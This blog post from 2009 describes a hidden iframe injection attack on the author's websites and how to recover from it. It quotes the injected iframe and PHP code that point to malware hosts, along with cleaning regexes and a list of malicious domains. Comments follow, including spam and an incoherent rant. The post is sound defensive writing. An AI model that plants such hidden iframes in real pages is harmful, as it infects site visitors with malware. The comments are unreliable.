Hidden iframe injection attacks

Mar 20 2009

[Updated on October 27, 2009 with new a version of the script]

It is a shame that after all those posts about security, some of my websites were under attack today.

Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack.

All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.

To the html pages the following piece of code was added:

<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

To php pages it added:

echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Asha took the effort and cleaned most of the infected files. We are monitoring the status now.

How did the worm inject the hidden iframes to my files?

There are two ways through which the worm is believed to infect your files:

1) Server is compromised

This is the most common way. Some o the websites residing in the same web server as your website may be compromised (o it may be some vulnerabilities in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites in the server.

2) Client side FTP

The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.

When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.

How can I recover from a hidden iframe injection attack?

Here are a few tips that might help you:

  1. The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
  2. Notify your web host about the attack and advice them to take measures against a possible server wide attack.
  3. Change the file permissions in your server to the maximum secure mode.
  4. Download all your files from the server and  check for infections. Clean the infected files.
  5. Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
  6. Never use public computers to access your server.

How do I clean infected files?

Use these regular expressions to search for all pages containig the malicious code and replace it with space:

<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>

echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;

You may have to write a script to automate this for all the files in the server.

I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.

You may want to change some hardcoded values inside the file.

Then visit the url:

http://www.yourdomain.com/clean.php?c=iframe

The parameter c specifies the text to search for inside the file. The results will be something like:

Clean hidden iframes

It will search all the files in your website and if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.

Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.

Will my search engine rankings be affected by this attack?

Try to be fast with these steps because if a visitor see the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave way for more sophisticated attacks.

Google will mark your site in it’s search results with a warning: “This site may harm your computer”.

Use the following link to see what google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):

http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk

As mentioned above, you must remove the malware from your local machine using some antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.

Note that when visiting an infected site, some antivirus softwares prompt you that “Trojan Horse Downloader”, an exe-file is trying to get loaded. Once the exe infects your machine, it will infect your server too.

Here are some more code samples caught from the wild:

<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

<iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>

There are obfuscated versions of the attack code too:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…  etc.

Here is a list of some other websites that host malicious content:

gumblar.cn

martuz.cn

beladen.net

38zu.cn

googleanalytlcs.net

lousecn.cn

fqwerz.cn

d99q.cn

orgsite.info

94.247.2.0

94.247.2.195

http://mmsreader.com

http://google-ana1yticz.com

http://my2.mobilesect.info

http://thedeadpit.com

http://internetcountercheck.com

http://165.194.30.123

http://ruoo.info

gogo2me.net/

http://live-counter.net

http://klinoneshoes.info

protection-livescan.com/

http://webexperience13.com

http://q5x.ru

http://q5x.ru
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net/
http://live-counter.net
http://klinoneshoes.info
protection-livescan.com/
http://webexperience13.com
http://q5x.ru

If you find these urls in any code in your website, that is a sure shot sign that you are infected.

100 responses so far

  • Redant32ltd says:

    I would like to say THANK YOU! your write up is very helpful. Now I know why and where we get that malware. maybe our web server are compromised. but they denying it.

    Thanks for your help and God Bless you.

  • Anish says:

    big twing. my personal webhttps://www.anishk.in got affected recently :(
    trying to remove it. Thanks for the post. will tryout the steps :-s

  • Jane says:

    Put the code into a page clean.php just like you said, put it in the root directory and when I put http://www.mydomain.com/clean.php?c=iframe into the browser all I get is your code. Then put it in the public.html and same thing.

    I’m getting an attack page on my blog’s home page. Tried also a search for just <iframe src= and it came out blank. Nothing found. :-(

  • Afrim says:

    Hello I recently found that my wordpress blog is under malware attacks. Actually it says it is infected and I noticed from earlier that when I opened the site I saw almost everytime one suspicious link loading something like smuus.net… ?

    And I did scanned with one website scanner and it found that one plugin file is infected with some hidden iframes which redirects to the site that I wrote upthere smuus.net/redirect.php

    I opened that javascript files in text editor but I cant find them. I used your script to find out smuus text it doesnt show any result. I searched for iframe it has a lot but almost all are css files. Css styles for iframe tags.

    There is the website scanner report:
    http://sitecheck.sucuri.net/results/shqipe.tk

    If you can help me it would be very generous from you.

  • Darius says:

    Hello,

    I cleaned up using your tool and now my website is not working anymore. I displays just a “0″. :( is there a way to fix my website?
    http://www.pipinga.com

    Thanks
    Darius

  • Jeff says:

    This really doesn’t make sense. I mean thanks for the script but you really don’t go into full detail after much.

    Example:
    ===================================================================
    How do I clean infected files?
    Use these regular expressions to search for all pages containig the malicious code and replace it with space:

    echo \”\”;

    You may have to write a script to automate this for all the files in the server.
    ===================================================================

    You don’t really tell us where to put this now. What line on what file. Nothing.

  • Jeff says:

    Not to mention it finds a false positive on every single file in every directory of a WordPress install.

  • becka says:

    I believe my computer was injected with this worm, however I am unable to get past the LOG IN screen to my desktop…. any suggestions?? thanks

    please email swamppudding@gmx.com

  • Eduardo says:

    Thanks so much for the script… it was very helpful. I found the malware and replaced “iframe” for the bad link in malware script…

    Got listed all the files which were hundreds of them. Site is clean right now thanks to you.

  • ralph says:

    Hi there

    I have the same problem. My Joomla sites have been hacked and in all folders, subfolders where an index.html or index.php files is was a line Iframe ….. entered.

    My problem is now that I cant even download the files from the ftp server because my virus software will not allow that. it does delete them automatically. How can I download them without having trouble? With for example sandboxie it didnt work.

    Thanks for any commeent.

    ralph

  • [...] those unfamiliar with iframe attacks, they can only happen by accessing the physical files of the website. This can be accomplished is through acquiring login credentials to the web server, [...]

  • unhidden files says:

    1. digital freedom !
    2. where hackers calling digitale demonstrations for citzen .
    3. who claimed pc digitale is our areas?
    4. when you all get wake ?
    5. god = evil = yah means goat god the synonyms are satan devil horns ? when you get awake never ever?
    6. you never heard about misleading script /txt/ books / bible / tv shows /all are the misleading satan junky informations “‘ src = satan_ falsifications _ untrue flags _ stealing session -start by satan- ancient years ago- #included nickenames = jeshua yahshua > == igual to satan .
    7.#included you get awake calling –
    8.# included lies value setting ( ) 1 activating or (0) functions no return satan more on earth . dll file stored on all servers .
    9. database oracal library – stored servers webpages browser ( implented scripts) .
    satan = god
    10. tags _ get element informations instead of fals narcisme lawsbooks protocols banned lawsbooks created by the males.
    11. delete bancs rules void* ( ) adress _ registery editor software versions.
    12. delete all login iframe scripts
    13. delete all logout script
    14 . all are satan males protocols they { block open txt made this oppresure rules = protocols. } end msg echo @ 2013
    15. freedom _ peace = free sharing for eternity .
    16. afterlife exist = we are withness tags universum protocols punished males 70 time more *!*@host males souls registerylist .universumcommatrix ~~
    17. day of ends = your day of end everheard about misinterpretations of the males mind !!!! you created your stories in your pervert minds males
    18. tags < we see all .
    19. headers src http encrypted generators rehash .
    20. ref h 1 ref h 2 { block s} next blocks { txt protocols lines of males sickly minds completions of overdone insane mental crazy }
    21. unhidden the files preview all bad males projects behavoir “provoking others “”
    created 3 warfare by traps .
    22. tags < input = freedom name = peace passwords = all living creatures on earth no more slaves sytems of money oppressure protocols .
    23. 2013 : end : happy xmast

  • Donnell says:

    I always used to read post in news papers but now as I aam a user
    of net so from nnow I am using net for articles, thanks
    to web.

  • However, it has become obvious, in recent years that, success means
    different things to different people. That is uncommon
    inside your affiliate marketing industry. Otherwise your friend will get really annoyed if you don’t follow-up on
    what she’s suggested. If you are thinking about joining a network marketing company then the following points might well be worth taking into consideration.
    Of course I don’t have to tell you, harassing your
    friends and family will not give you the results you are looking for.

  • Fortunately forr homeowners, modern furnaces have become far more efficient with the help of new
    technology. It also helps build your muscles due to the high
    protein content of nuts. And because there aree more contaminants inn
    the latter, they can clog up your heating system, especially
    the fuel tank filter.

  • These website injections are very popular now a days Spyware and worms attack many website. How can be safe these iframe or injection. dont delete any files from server just ask to hosting authorities and said it please run antivirus in our hosting plan these file be cleaned after a virus cleaner. our dedicated server is also infected these worms but i Clean virus and you can change your Password after the month. lots of nulled scripts are very helpful to spread these type of infections.

  • Everyone loves it when individuals get together and share views.

    Great blog, continue the good work!

Leave a Reply